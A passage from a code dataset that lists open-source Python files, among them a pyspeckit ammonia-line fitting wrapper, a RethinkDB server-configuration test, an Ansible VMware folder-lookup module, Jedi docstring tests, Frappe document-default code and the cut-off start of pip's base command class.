repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
e-koch/pyspeckit | pyspeckit/wrappers/fitnh3.py | 1 | 16066 | """
NH3 fitter wrapper
==================
Wrapper to fit ammonia spectra. Generates a reasonable guess at the position
and velocity using a gaussian fit
Example use:
.. code:: python
import pyspeckit
sp11 = pyspeckit.Spectrum('spec.nh3_11.dat', errorcol=999)
sp22 = pyspeckit.Spectrum('spec.nh3_22.dat', errorcol=999)
sp33 = pyspeckit.Spectrum('spec.nh3_33.dat', errorcol=999)
sp11.xarr.refX = pyspeckit.spectrum.models.ammonia.freq_dict['oneone']
sp22.xarr.refX = pyspeckit.spectrum.models.ammonia.freq_dict['twotwo']
sp33.xarr.refX = pyspeckit.spectrum.models.ammonia.freq_dict['threethree']
input_dict={'oneone':sp11, 'twotwo':sp22, 'threethree':sp33}
spf = pyspeckit.wrappers.fitnh3.fitnh3tkin(input_dict)
Note that if you want to use the plotter wrapper with cubes, you need to do
something like the following, where the ``plot_special`` method of the stacked
``cubes`` object is set to the ``plotter_override`` function defined in the
fitnh3_wrapper code:
.. code:: python
cubes.plot_special = pyspeckit.wrappers.fitnh3.plotter_override
cubes.plot_special_kwargs = {'fignum':3, 'vrange':[55,135]}
cubes.plot_spectrum(160,99)
"""
from __future__ import print_function
import warnings
from astropy.extern.six.moves import xrange
from astropy.extern.six import iteritems
import pyspeckit
from .. import spectrum
from ..spectrum.classes import Spectrum, Spectra
from ..spectrum import units
from ..spectrum.models import ammonia_constants
import numpy as np
import copy
import random
from astropy import log
from astropy import units as u
pyspeckit.spectrum.fitters.default_Registry.add_fitter('ammonia_tau_thin',
pyspeckit.spectrum.models.ammonia.ammonia_model_vtau_thin(),
5)
title_dict = {'oneone':'NH$_3(1, 1)$', 'twotwo':'NH$_3(2, 2)$',
'threethree':'NH$_3(3, 3)$', 'fourfour':'NH$_3(4, 4)$',
'fivefive':'NH$_3(5, 5)$', 'sixsix':'NH$_3(6, 6)$',
'sevenseven':'NH$_3(7, 7)$', 'eighteight':'NH$_3(8, 8)$',
}
def fitnh3tkin(input_dict, dobaseline=True, baselinekwargs={}, crop=False,
cropunit=None, guessline='twotwo', tex=15, trot=20, column=15.0,
fortho=0.66, tau=None, thin=False, quiet=False, doplot=True,
fignum=1, guessfignum=2, smooth=False, scale_keyword=None,
rebase=False, tkin=None, npeaks=1, guesses=None,
fittype='ammonia',
guess_error=True, plotter_wrapper_kwargs={}, **kwargs):
"""
Given a dictionary of filenames and lines, fit them together
e.g. {'oneone':'G000.000+00.000_nh3_11.fits'}
Parameters
----------
input_dict : dict
A dictionary in which the keys are the ammonia line names (e.g.,
'oneone', 'twotwo', etc) and the values are either Spectrum objects
or filenames of spectra
dobaseline : bool
Fit and subtract a baseline prior to fitting the model?
Keyword arguments to `pyspeckit.spectrum.Spectrum.baseline` are
specified in ``baselinekwargs``.
baselinekwargs : dict
The keyword arguments for the baseline
crop : bool or tuple
A range of values to crop the spectrum to. The units are specified by
``cropunit``; the default ``None`` will use pixels. If False, no
cropping will be performed.
cropunit : None or astropy unit
The unit for the crop parameter
guess_error : bool
Use the guess line to estimate the error in all spectra?
plotter_wrapper_kwargs : dict
Keyword arguments to pass to the plotter
fittype: 'ammonia' or 'cold_ammonia'
The fitter model to use. This is overridden if `tau` is specified,
in which case one of the `ammonia_tau` models is used (see source code)
"""
if tkin is not None:
if trot == 20 or trot is None:
trot = tkin
else:
raise ValueError("Please specify trot, not tkin")
warnings.warn("Keyword 'tkin' is deprecated; use trot instead", DeprecationWarning)
spdict = dict([(linename, Spectrum(value, scale_keyword=scale_keyword))
if type(value) is str else (linename, value)
for linename, value in iteritems(input_dict)
])
splist = spdict.values()
for transition, sp in spdict.items(): # required for plotting, cropping
sp.xarr.convert_to_unit('km/s', velocity_convention='radio',
refX=pyspeckit.spectrum.models.ammonia.freq_dict[transition]*u.Hz,
quiet=True)
if crop and len(crop) == 2:
for sp in splist:
sp.crop(*crop, unit=cropunit)
if dobaseline:
for sp in splist:
sp.baseline(**baselinekwargs)
if smooth and type(smooth) is int:
for sp in splist:
sp.smooth(smooth)
spdict[guessline].specfit(fittype='gaussian', negamp=False, vheight=False,
guesses='moments')
ampguess, vguess, widthguess = spdict[guessline].specfit.modelpars
if widthguess < 0:
raise ValueError("Width guess was < 0. This is impossible.")
print("RMS guess (errspec): ", spdict[guessline].specfit.errspec.mean())
print("RMS guess (residuals): ", spdict[guessline].specfit.residuals.std())
errguess = spdict[guessline].specfit.residuals.std()
if rebase:
# redo baseline subtraction excluding the centroid +/- about 20 km/s
vlow = spdict[guessline].specfit.modelpars[1]-(19.8+spdict[guessline].specfit.modelpars[2]*2.35)
vhigh = spdict[guessline].specfit.modelpars[1]+(19.8+spdict[guessline].specfit.modelpars[2]*2.35)
for sp in splist:
sp.baseline(exclude=[vlow, vhigh], **baselinekwargs)
for sp in splist:
if guess_error:
sp.error[:] = errguess
sp.xarr.convert_to_unit(u.GHz)
if doplot:
spdict[guessline].plotter(figure=guessfignum)
spdict[guessline].specfit.plot_fit()
spectra = Spectra(splist)
spectra.specfit.npeaks = npeaks
if tau is not None:
if guesses is None:
guesses = [a for i in xrange(npeaks) for a in
(trot+random.random()*i, tex, tau+random.random()*i,
widthguess+random.random()*i, vguess+random.random()*i,
fortho)]
fittype = 'ammonia_tau_thin' if thin else 'ammonia_tau'
spectra.specfit(fittype=fittype, quiet=quiet, guesses=guesses,
**kwargs)
else:
if guesses is None:
guesses = [a for i in xrange(npeaks) for a in
(trot+random.random()*i, tex, column+random.random()*i,
widthguess+random.random()*i, vguess+random.random()*i,
fortho)]
if thin:
raise ValueError("'thin' keyword not supported for the generic ammonia model")
spectra.specfit(fittype=fittype, quiet=quiet, guesses=guesses,
**kwargs)
if doplot:
plot_nh3(spdict, spectra, fignum=fignum, **plotter_wrapper_kwargs)
return spdict, spectra
def plot_nh3(spdict, spectra, fignum=1, show_components=False,
residfignum=None, show_hyperfine_components=True, annotate=True,
axdict=None, figure=None,
**plotkwargs):
"""
Plot the results from a multi-nh3 fit
spdict needs to be dictionary with form:
'oneone': spectrum,
'twotwo': spectrum,
etc.
"""
from matplotlib import pyplot
if figure is None:
spectra.plotter.figure = pyplot.figure(fignum)
spectra.plotter.axis = spectra.plotter.figure.gca()
splist = spdict.values()
for transition, sp in spdict.items():
sp.xarr.convert_to_unit('km/s', velocity_convention='radio',
refX=pyspeckit.spectrum.models.ammonia.freq_dict[transition]*u.Hz,
quiet=True)
try:
sp.specfit.fitter = copy.copy(spectra.specfit.fitter)
sp.specfit.fitter.npeaks = spectra.specfit.npeaks
except AttributeError:
pass
sp.specfit.modelpars = spectra.specfit.modelpars
sp.specfit.parinfo = spectra.specfit.parinfo
sp.specfit.npeaks = spectra.specfit.npeaks
if spectra.specfit.modelpars is not None:
sp.specfit.model = sp.specfit.fitter.n_ammonia(pars=spectra.specfit.modelpars, parnames=spectra.specfit.fitter.parnames)(sp.xarr)
if axdict is None:
axdict = make_axdict(splist, spdict)
for linename, sp in iteritems(spdict):
if linename not in axdict:
raise NotImplementedError("Plot windows for {0} cannot "
"be automatically arranged (yet)."
.format(linename))
sp.plotter.axis=axdict[linename] # permanent
sp.plotter(axis=axdict[linename], title=title_dict[linename], **plotkwargs)
sp.specfit.Spectrum.plotter = sp.plotter
sp.specfit.selectregion(reset=True)
if sp.specfit.modelpars is not None:
sp.specfit.plot_fit(annotate=False, show_components=show_components,
show_hyperfine_components=show_hyperfine_components)
if spdict['oneone'].specfit.modelpars is not None and annotate:
spdict['oneone'].specfit.annotate(labelspacing=0.05,
prop={'size':'small',
'stretch':'extra-condensed'},
frameon=False)
if residfignum is not None:
pyplot.figure(residfignum)
pyplot.clf()
axdict = make_axdict(splist, spdict)
for linename, sp in iteritems(spdict):
sp.specfit.plotresiduals(axis=axdict[linename])
def make_axdict(splist, spdict):
from matplotlib import pyplot
axdict = {}
if len(splist) == 2:
ii = 1
for linename in ammonia_constants.line_names:
if linename in spdict:
axdict[linename] = pyplot.subplot(2,1,ii)
ii+=1
elif len(splist) == 3:
ii = 1
for linename in ammonia_constants.line_names:
if linename in spdict:
if ii == 1:
axdict[linename] = pyplot.subplot(2,1,ii)
ii+=2
else:
axdict[linename] = pyplot.subplot(2,2,ii)
ii+=1
elif len(splist) == 4:
ii = 1
for linename in ammonia_constants.line_names:
if linename in spdict:
axdict[linename] = pyplot.subplot(2,2,ii)
ii+=1
else:
raise NotImplementedError("Plots with {0} subplots are not yet "
"implemented. Pull requests are "
"welcome!".format(len(splist)))
return axdict
def fitnh3(spectrum, vrange=[-100, 100], vrangeunit='km/s', quiet=False, Tex=20,
trot=15, column=1e15, fortho=1.0, tau=None, Tkin=None,
fittype='ammonia',
spec_convert_kwargs={}):
if Tkin is not None:
if trot == 20 or trot is None:
trot = Tkin
else:
raise ValueError("Please specify trot, not Tkin")
warnings.warn("Keyword 'Tkin' is deprecated; use trot instead", DeprecationWarning)
if vrange:
spectrum.xarr.convert_to_unit(vrangeunit, **spec_convert_kwargs)
spectrum.crop(*vrange, unit=vrangeunit)
spectrum.specfit(fittype='gaussian', negamp=False, guesses='moments')
ampguess, vguess, widthguess = spectrum.specfit.modelpars
if tau is None:
spectrum.specfit(fittype=fittype, quiet=quiet,
guesses=[Tex, trot, column, widthguess, vguess,
fortho])
else:
spectrum.specfit(fittype='ammonia_tau', quiet=quiet,
guesses=[Tex, trot, tau, widthguess, vguess, fortho])
return spectrum
def BigSpectrum_to_NH3dict(sp, vrange=None):
"""
A rather complicated way to make the spdicts above given a spectrum...
"""
sp.xarr.convert_to_unit('GHz')
spdict = {}
for linename, freq in iteritems(spectrum.models.ammonia.freq_dict):
if not hasattr(freq, 'unit'):
freq = freq*u.Hz
if vrange is not None:
freq_test_low = freq - freq * vrange[0]/units.speedoflight_kms
freq_test_high = freq - freq * vrange[1]/units.speedoflight_kms
else:
freq_test_low = freq_test_high = freq
log.debug("line {2}: freq test low, high: {0}, {1}"
.format(freq_test_low, freq_test_high, linename))
if (sp.xarr.as_unit('Hz').in_range(freq_test_low) or
sp.xarr.as_unit('Hz').in_range(freq_test_high)):
spdict[linename] = sp.copy(deep=True)
spdict[linename].xarr.convert_to_unit('GHz')
assert np.all(np.array(spdict[linename].xarr == sp.xarr,
dtype='bool'))
spdict[linename].xarr.refX = freq
spdict[linename].xarr.convert_to_unit('km/s',
velocity_convention='radio',
refX=pyspeckit.spectrum.models.ammonia.freq_dict[linename]*u.Hz,
quiet=True)
np.testing.assert_array_almost_equal(spdict[linename].xarr.as_unit('GHz').value,
sp.xarr.value)
log.debug("Line {0}={2}: {1}".format(linename, spdict[linename],
freq))
if vrange is not None:
try:
spdict[linename] = spdict[linename].slice(start=vrange[0],
stop=vrange[1],
unit='km/s')
log.debug("Successfully cropped {0} to {1}, freq = {2}, {3}"
.format(linename, vrange, freq,
spdict[linename].xarr))
if len(spdict[linename]) == 0:
spdict.pop(linename)
log.debug("Removed {0} from spdict".format(linename))
except IndexError:
# if the freq in range, but there's no data in range, remove
spdict.pop(linename)
else:
log.debug("Line {0} not in spectrum".format(linename))
# this shouldn't be reachable, but there are reported cases where spdict
# gets populated w/empty spectra, which leads to a failure in producing
# their repr. Since that on its own isn't a very helpful error message,
# we'd rather return the bad spdict and see if the next function down the
# line can survive with a questionable spdict...
try:
log.debug(str(spdict))
except Exception as ex:
log.debug(str(ex))
return spdict
def plotter_override(sp, vrange=None, **kwargs):
"""
Do plot_nh3 with syntax similar to plotter()
"""
spdict = BigSpectrum_to_NH3dict(sp, vrange=vrange)
log.debug("spdict: {0}".format(spdict))
if len(spdict) > 4:
raise ValueError("Too many lines ({0}) found.".format(len(spdict)))
if len(spdict) not in (2, 3, 4):
raise ValueError("Not enough lines; don't need to use the NH3 plot "
"wrapper. If you think you are getting this message "
"incorrectly, check the velocity range (vrange "
"parameter) and make sure your spectrum overlaps with "
" it.")
plot_nh3(spdict, sp, **kwargs)
return spdict
| mit |
tempbottle/rethinkdb | test/interface/server_config.py | 9 | 7581 | #!/usr/bin/env python
# Copyright 2014-2015 RethinkDB, all rights reserved.
import os, sys, time
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, 'common')))
import driver, scenario_common, utils, vcoptparse
op = vcoptparse.OptParser()
scenario_common.prepare_option_parser_mode_flags(op)
_, command_prefix, serve_options = scenario_common.parse_mode_flags(op.parse(sys.argv))
r = utils.import_python_driver()
dbName, tableName = utils.get_test_db_table()
utils.print_with_time("Starting cluster of 2 servers")
with driver.Cluster(output_folder='.') as cluster:
process1 = driver.Process(cluster, name='a', server_tags=["foo"], command_prefix=command_prefix, extra_options=serve_options + ["--cache-size", "auto"])
process2 = driver.Process(cluster, name='b', server_tags=["foo", "bar"], command_prefix=command_prefix, extra_options=serve_options + ["--cache-size", "123"])
cluster.wait_until_ready()
utils.print_with_time("Establishing ReQL connections")
reql_conn1 = r.connect(process1.host, process1.driver_port)
reql_conn2 = r.connect(process2.host, process2.driver_port)
assert r.db("rethinkdb").table("server_config").count().run(reql_conn1) == 2
assert process1.uuid == r.db("rethinkdb").table("server_config").filter({"name":process1.name}).nth(0)["id"].run(reql_conn1)
assert process2.uuid == r.db("rethinkdb").table("server_config").filter({"name":"b"}).nth(0)["id"].run(reql_conn1)
def check_name(uuid, expect_name):
names = [r.db("rethinkdb").table("server_config").get(uuid)["name"].run(c) for c in [reql_conn1, reql_conn2]]
assert names[0] == names[1] == expect_name, 'The tags did not match: %s vs. %s vs. %s' % (names[0], names[1], expect_name)
def check_tags(uuid, expect_tags):
tags = [r.db("rethinkdb").table("server_config").get(uuid)["tags"].run(c) for c in [reql_conn1, reql_conn2]]
assert set(tags[0]) == set(tags[1]) == set(expect_tags), 'The tags did not match: %s vs. %s vs. %s' % (str(tags[0]), str(tags[1]), str(expect_tags))
# == check working with names
utils.print_with_time("Checking initial names")
check_name(process1.uuid, "a")
check_name(process2.uuid, "b")
cluster.check()
utils.print_with_time("Checking changing name locally")
res = r.db("rethinkdb").table("server_config").get(process1.uuid).update({"name": "a2"}).run(reql_conn1)
assert res["errors"] == 0
time.sleep(.2)
check_name(process1.uuid, "a2")
check_name(process2.uuid, "b")
cluster.check()
utils.print_with_time("Checking changing name remotely")
res = r.db("rethinkdb").table("server_config").get(process2.uuid).update({"name": "b2"}).run(reql_conn1)
assert res["errors"] == 0
time.sleep(.2)
check_name(process1.uuid, "a2")
check_name(process2.uuid, "b2")
cluster.check()
utils.print_with_time("Checking that name conflicts are rejected")
res = r.db("rethinkdb").table("server_config").get(process1.uuid).update({"name": "b2"}).run(reql_conn1)
assert res["errors"] == 1
assert "already exists" in res["first_error"]
time.sleep(.2)
check_name(process1.uuid, "a2")
check_name(process2.uuid, "b2")
cluster.check()
# == check working with tags
utils.print_with_time("Checking initial tags")
check_tags(process1.uuid, ["default", "foo"])
check_tags(process2.uuid, ["default", "foo", "bar"])
cluster.check()
utils.print_with_time("Checking changing tags locally")
res = r.db("rethinkdb").table("server_config").get(process1.uuid).update({"tags": ["baz"]}).run(reql_conn1)
assert res["errors"] == 0
time.sleep(.2)
check_tags(process1.uuid, ["baz"])
check_tags(process2.uuid, ["default", "foo", "bar"])
cluster.check()
utils.print_with_time("Checking changing tags remotely")
res = r.db("rethinkdb").table("server_config").get(process2.uuid).update({"tags": ["quz"]}).run(reql_conn1)
assert res["errors"] == 0
time.sleep(.2)
check_tags(process1.uuid, ["baz"])
check_tags(process2.uuid, ["quz"])
cluster.check()
utils.print_with_time("Checking that invalid tags are rejected")
res = r.db("rethinkdb").table("server_config").get(process1.uuid).update({"tags": [":-)"]}).run(reql_conn1)
assert res["errors"] == 1, "It shouldn't be possible to set tags that aren't valid names."
time.sleep(.2)
check_tags(process1.uuid, ["baz"])
check_tags(process2.uuid, ["quz"])
cluster.check()
utils.print_with_time("Checking initial cache size")
res = r.db("rethinkdb").table("server_config").get(process1.uuid)["cache_size_mb"].run(reql_conn1)
assert res == "auto", res
res = r.db("rethinkdb").table("server_config") \
.get(process2.uuid)["cache_size_mb"].run(reql_conn1)
assert res == 123, res
res = r.db("rethinkdb").table("server_status") \
.get(process2.uuid)["process"]["cache_size_mb"].run(reql_conn1)
assert res == 123, res
utils.print_with_time("Checking that cache size can be changed...")
res = r.db("rethinkdb").table("server_config") \
.get(process2.uuid).update({"cache_size_mb": 234}) \
.run(reql_conn1)
assert res["errors"] == 0, res
res = r.db("rethinkdb").table("server_config") \
.get(process2.uuid)["cache_size_mb"].run(reql_conn1)
assert res == 234, res
res = r.db("rethinkdb").table("server_status") \
.get(process2.uuid)["process"]["cache_size_mb"].run(reql_conn1)
assert res == 234, res
utils.print_with_time("Checking that absurd cache sizes are rejected...")
def try_bad_cache_size(size, message):
res = r.db("rethinkdb").table("server_config") \
.get(process2.uuid).update({"cache_size_mb": r.literal(size)}) \
.run(reql_conn1)
assert res["errors"] == 1, res
assert message in res["first_error"]
try_bad_cache_size("foobar", "wrong format")
try_bad_cache_size(-30, "wrong format")
try_bad_cache_size({}, "wrong format")
# 2**40 is chosen so that it fits into a 64-bit integer when expressed in bytes, to
# test the code path where the value is sent to the other server but then rejected by
# validate_total_cache_size().
try_bad_cache_size(2**40, "Error when trying to change the configuration")
# 2**100 is chosen so that it doesn't fit into a 64-bit integer, so it will take a
# different code path and get a different error message.
try_bad_cache_size(2**100, "wrong format")
utils.print_with_time("Checking that nonsense is rejected...")
res = r.db("rethinkdb").table("server_config") \
.insert({"name": "hi", "tags": [], "cache_size": 100}).run(reql_conn1)
assert res["errors"] == 1, res
res = r.db("rethinkdb").table("server_config").update({"foo": "bar"}).run(reql_conn1)
assert res["errors"] == 2, res
res = r.db("rethinkdb").table("server_config").update({"name": 2}).run(reql_conn1)
assert res["errors"] == 2, res
res = r.db("rethinkdb").table("server_config").replace(r.row.without("name")) \
.run(reql_conn1)
assert res["errors"] == 2, res
res = r.db("rethinkdb").table("server_config") \
.update({"cache_size": "big!"}).run(reql_conn1)
assert res["errors"] == 2, res
res = r.db("rethinkdb").table("server_config").update({"tags": 0}).run(reql_conn1)
assert res["errors"] == 2, res
cluster.check_and_stop()
utils.print_with_time("Cleaning up")
utils.print_with_time("Done")
| agpl-3.0 |
Dhivyap/ansible | lib/ansible/modules/cloud/vmware/vmware_guest_find.py | 18 | 4775 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: vmware_guest_find
short_description: Find the folder path(s) for a virtual machine by name or UUID
description:
- Find the folder path(s) for a virtual machine by name or UUID
version_added: 2.4
author:
- Abhijeet Kasurde (@Akasurde) <akasurde@redhat.com>
notes:
- Tested on vSphere 6.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
name:
description:
- Name of the VM to work with.
- This is required if C(uuid) parameter is not supplied.
type: str
uuid:
description:
- UUID of the instance to manage if known, this is VMware's BIOS UUID by default.
- This is required if C(name) parameter is not supplied.
type: str
use_instance_uuid:
description:
- Whether to use the VMware instance UUID rather than the BIOS UUID.
default: no
type: bool
version_added: '2.8'
datacenter:
description:
- Destination datacenter for the find operation.
- Deprecated in 2.5, will be removed in 2.9 release.
type: str
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- name: Find Guest's Folder using name
vmware_guest_find:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
validate_certs: no
name: testvm
delegate_to: localhost
register: vm_folder
- name: Find Guest's Folder using UUID
vmware_guest_find:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
uuid: 38c4c89c-b3d7-4ae6-ae4e-43c5118eae49
delegate_to: localhost
register: vm_folder
'''
RETURN = r"""
folders:
description: List of folders for user specified virtual machine
returned: on success
type: list
sample: [
'/DC0/vm',
]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
from ansible.module_utils.vmware import PyVmomi, vmware_argument_spec, find_vm_by_id
try:
from pyVmomi import vim
except ImportError:
pass
class PyVmomiHelper(PyVmomi):
def __init__(self, module):
super(PyVmomiHelper, self).__init__(module)
self.name = self.params['name']
self.uuid = self.params['uuid']
self.use_instance_uuid = self.params['use_instance_uuid']
def getvm_folder_paths(self):
results = []
vms = []
if self.uuid:
if self.use_instance_uuid:
vm_obj = find_vm_by_id(self.content, vm_id=self.uuid, vm_id_type="instance_uuid")
else:
vm_obj = find_vm_by_id(self.content, vm_id=self.uuid, vm_id_type="uuid")
if vm_obj is None:
self.module.fail_json(msg="Failed to find the virtual machine with UUID : %s" % self.uuid)
vms = [vm_obj]
elif self.name:
objects = self.get_managed_objects_properties(vim_type=vim.VirtualMachine, properties=['name'])
for temp_vm_object in objects:
if temp_vm_object.obj.name == self.name:
vms.append(temp_vm_object.obj)
for vm in vms:
folder_path = self.get_vm_path(self.content, vm)
results.append(folder_path)
return results
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
name=dict(type='str'),
uuid=dict(type='str'),
use_instance_uuid=dict(type='bool', default=False),
datacenter=dict(removed_in_version=2.9, type='str')
)
module = AnsibleModule(argument_spec=argument_spec,
required_one_of=[['name', 'uuid']],
mutually_exclusive=[['name', 'uuid']],
)
pyv = PyVmomiHelper(module)
# Check if the VM exists before continuing
folders = pyv.getvm_folder_paths()
# VM already exists
if folders:
try:
module.exit_json(folders=folders)
except Exception as exc:
module.fail_json(msg="Folder enumeration failed with exception %s" % to_native(exc))
else:
module.fail_json(msg="Unable to find folders for virtual machine %s" % (module.params.get('name') or
module.params.get('uuid')))
if __name__ == '__main__':
main()
| gpl-3.0 |
dCache/dcache-docker | dcache/deps/.vim/bundle/jedi-vim/jedi/test/test_evaluate/test_docstring.py | 16 | 4392 | """
Testing of docstring related issues and especially ``jedi.docstrings``.
"""
from textwrap import dedent
import jedi
from ..helpers import unittest
try:
import numpydoc
except ImportError:
numpydoc_unavailable = True
else:
numpydoc_unavailable = False
class TestDocstring(unittest.TestCase):
def test_function_doc(self):
defs = jedi.Script("""
def func():
'''Docstring of `func`.'''
func""").goto_definitions()
self.assertEqual(defs[0].raw_doc, 'Docstring of `func`.')
@unittest.skip('need evaluator class for that')
def test_attribute_docstring(self):
defs = jedi.Script("""
x = None
'''Docstring of `x`.'''
x""").goto_definitions()
self.assertEqual(defs[0].raw_doc, 'Docstring of `x`.')
@unittest.skip('need evaluator class for that')
def test_multiple_docstrings(self):
defs = jedi.Script("""
def func():
'''Original docstring.'''
x = func
'''Docstring of `x`.'''
x""").goto_definitions()
docs = [d.raw_doc for d in defs]
self.assertEqual(docs, ['Original docstring.', 'Docstring of `x`.'])
def test_completion(self):
assert jedi.Script('''
class DocstringCompletion():
#? []
""" asdfas """''').completions()
def test_docstrings_type_dotted_import(self):
s = """
def func(arg):
'''
:type arg: random.Random
'''
arg."""
names = [c.name for c in jedi.Script(s).completions()]
assert 'seed' in names
def test_docstrings_param_type(self):
s = """
def func(arg):
'''
:param str arg: some description
'''
arg."""
names = [c.name for c in jedi.Script(s).completions()]
assert 'join' in names
def test_docstrings_type_str(self):
s = """
def func(arg):
'''
:type arg: str
'''
arg."""
names = [c.name for c in jedi.Script(s).completions()]
assert 'join' in names
def test_docstring_instance(self):
# The types hint that it's a certain kind
s = dedent("""
class A:
def __init__(self,a):
'''
:type a: threading.Thread
'''
if a is not None:
a.start()
self.a = a
def method_b(c):
'''
:type c: A
'''
c.""")
names = [c.name for c in jedi.Script(s).completions()]
assert 'a' in names
assert '__init__' in names
assert 'mro' not in names # Exists only for types.
@unittest.skipIf(numpydoc_unavailable, 'numpydoc module is unavailable')
def test_numpydoc_docstring(self):
s = dedent('''
def foobar(x, y):
"""
Parameters
----------
x : int
y : str
"""
y.''')
names = [c.name for c in jedi.Script(s).completions()]
assert 'isupper' in names
assert 'capitalize' in names
@unittest.skipIf(numpydoc_unavailable, 'numpydoc module is unavailable')
def test_numpydoc_docstring_set_of_values(self):
s = dedent('''
def foobar(x, y):
"""
Parameters
----------
x : {'foo', 'bar', 100500}, optional
"""
x.''')
names = [c.name for c in jedi.Script(s).completions()]
assert 'isupper' in names
assert 'capitalize' in names
assert 'numerator' in names
@unittest.skipIf(numpydoc_unavailable, 'numpydoc module is unavailable')
def test_numpydoc_alternative_types(self):
s = dedent('''
def foobar(x, y):
"""
Parameters
----------
x : int or str or list
"""
x.''')
names = [c.name for c in jedi.Script(s).completions()]
assert 'isupper' in names
assert 'capitalize' in names
assert 'numerator' in names
assert 'append' in names
| gpl-3.0 |
gangadhar-kadam/helpdesk-frappe | frappe/model/create_new.py | 15 | 4829 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Create a new document with defaults set
"""
import frappe
from frappe.utils import nowdate, nowtime, now_datetime
import frappe.defaults
from frappe.model.db_schema import type_map
import copy
def get_new_doc(doctype, parent_doc = None, parentfield = None, as_dict=False):
if doctype not in frappe.local.new_doc_templates:
# cache a copy of new doc as it is called
# frequently for inserts
frappe.local.new_doc_templates[doctype] = make_new_doc(doctype)
doc = copy.deepcopy(frappe.local.new_doc_templates[doctype])
# doc = make_new_doc(doctype)
set_dynamic_default_values(doc, parent_doc, parentfield)
if as_dict:
return doc
else:
return frappe.get_doc(doc)
def make_new_doc(doctype):
doc = frappe.get_doc({
"doctype": doctype,
"__islocal": 1,
"owner": frappe.session.user,
"docstatus": 0
})
set_user_and_static_default_values(doc)
doc._fix_numeric_types()
doc = doc.get_valid_dict()
doc["doctype"] = doctype
doc["__islocal"] = 1
return doc
def set_user_and_static_default_values(doc):
user_permissions = frappe.defaults.get_user_permissions()
defaults = frappe.defaults.get_defaults()
for df in doc.meta.get("fields"):
if df.fieldtype in type_map:
user_default_value = get_user_default_value(df, defaults, user_permissions)
if user_default_value is not None:
doc.set(df.fieldname, user_default_value)
else:
if df.fieldname != doc.meta.title_field:
static_default_value = get_static_default_value(df, user_permissions)
if static_default_value is not None:
doc.set(df.fieldname, static_default_value)
def get_user_default_value(df, defaults, user_permissions):
# don't set defaults for "User" link field using User Permissions!
if df.fieldtype == "Link" and df.options != "User":
# 1 - look in user permissions only for document_type==Setup
# We don't want to include permissions of transactions to be used for defaults.
if (frappe.get_meta(df.options).document_type=="Setup"
and user_permissions_exist(df, user_permissions)
and len(user_permissions[df.options])==1):
return user_permissions[df.options][0]
# 2 - Look in user defaults
user_default = defaults.get(df.fieldname)
is_allowed_user_default = user_default and (not user_permissions_exist(df, user_permissions)
or (user_default in user_permissions.get(df.options, [])))
# is this user default also allowed as per user permissions?
if is_allowed_user_default:
return user_default
def get_static_default_value(df, user_permissions):
# 3 - look in default of docfield
if df.get("default"):
if df.default == "__user":
return frappe.session.user
elif df.default == "Today":
return nowdate()
elif not df.default.startswith(":"):
# a simple default value
is_allowed_default_value = (not user_permissions_exist(df, user_permissions)
or (df.default in user_permissions.get(df.options, [])))
if df.fieldtype!="Link" or df.options=="User" or is_allowed_default_value:
return df.default
elif (df.fieldtype == "Select" and df.options and df.options not in ("[Select]", "Loading...")):
return df.options.split("\n")[0]
def set_dynamic_default_values(doc, parent_doc, parentfield):
# these values should not be cached
user_permissions = frappe.defaults.get_user_permissions()
for df in frappe.get_meta(doc["doctype"]).get("fields"):
if df.get("default"):
if df.default.startswith(":"):
default_value = get_default_based_on_another_field(df, user_permissions, parent_doc)
if default_value is not None:
doc[df.fieldname] = default_value
elif df.fieldtype == "Datetime" and df.default.lower() == "now":
doc[df.fieldname] = now_datetime()
if df.fieldtype == "Time":
doc[df.fieldname] = nowtime()
if parent_doc:
doc["parent"] = parent_doc.name
doc["parenttype"] = parent_doc.doctype
if parentfield:
doc["parentfield"] = parentfield
def user_permissions_exist(df, user_permissions):
return (df.fieldtype=="Link"
and not getattr(df, "ignore_user_permissions", False)
and df.options in (user_permissions or []))
def get_default_based_on_another_field(df, user_permissions, parent_doc):
# default value based on another document
ref_doctype = df.default[1:]
ref_fieldname = ref_doctype.lower().replace(" ", "_")
reference_name = parent_doc.get(ref_fieldname) if parent_doc else frappe.db.get_default(ref_fieldname)
default_value = frappe.db.get_value(ref_doctype, reference_name, df.fieldname)
is_allowed_default_value = (not user_permissions_exist(df, user_permissions) or
(default_value in user_permissions.get(df.options, [])))
# is this allowed as per user permissions
if is_allowed_default_value:
return default_value
| mit |
jessefeinman/FintechHackathon | venv/Lib/site-packages/pip/basecommand.py | 79 | 11648 | """Base Command class, and related routines"""
from __future__ import absolute_import
import logging
import os
import sys
import optparse
import warnings
from pip import cmdoptions
from pip.index import PackageFinder
from pip.locations import running_under_virtualenv
from pip.download import PipSession
from pip.exceptions import (BadCommand, InstallationError, UninstallationError,
CommandError, PreviousBuildDirError)
from pip.compat import logging_dictConfig
from pip.baseparser import ConfigOptionParser, UpdatingDefaultsHelpFormatter
from pip.req import InstallRequirement, parse_requirements
from pip.status_codes import (
SUCCESS, ERROR, UNKNOWN_ERROR, VIRTUALENV_NOT_FOUND,
PREVIOUS_BUILD_DIR_ERROR,
)
from pip.utils import deprecation, get_prog, normalize_path
from pip.utils.logging import IndentingFormatter
from pip.utils.outdated import pip_version_check
__all__ = ['Command']
logger = logging.getLogger(__name__)
class Command(object):
name = None
usage = None
hidden = False
log_streams = ("ext://sys.stdout", "ext://sys.stderr")
def __init__(self, isolated=False):
parser_kw = {
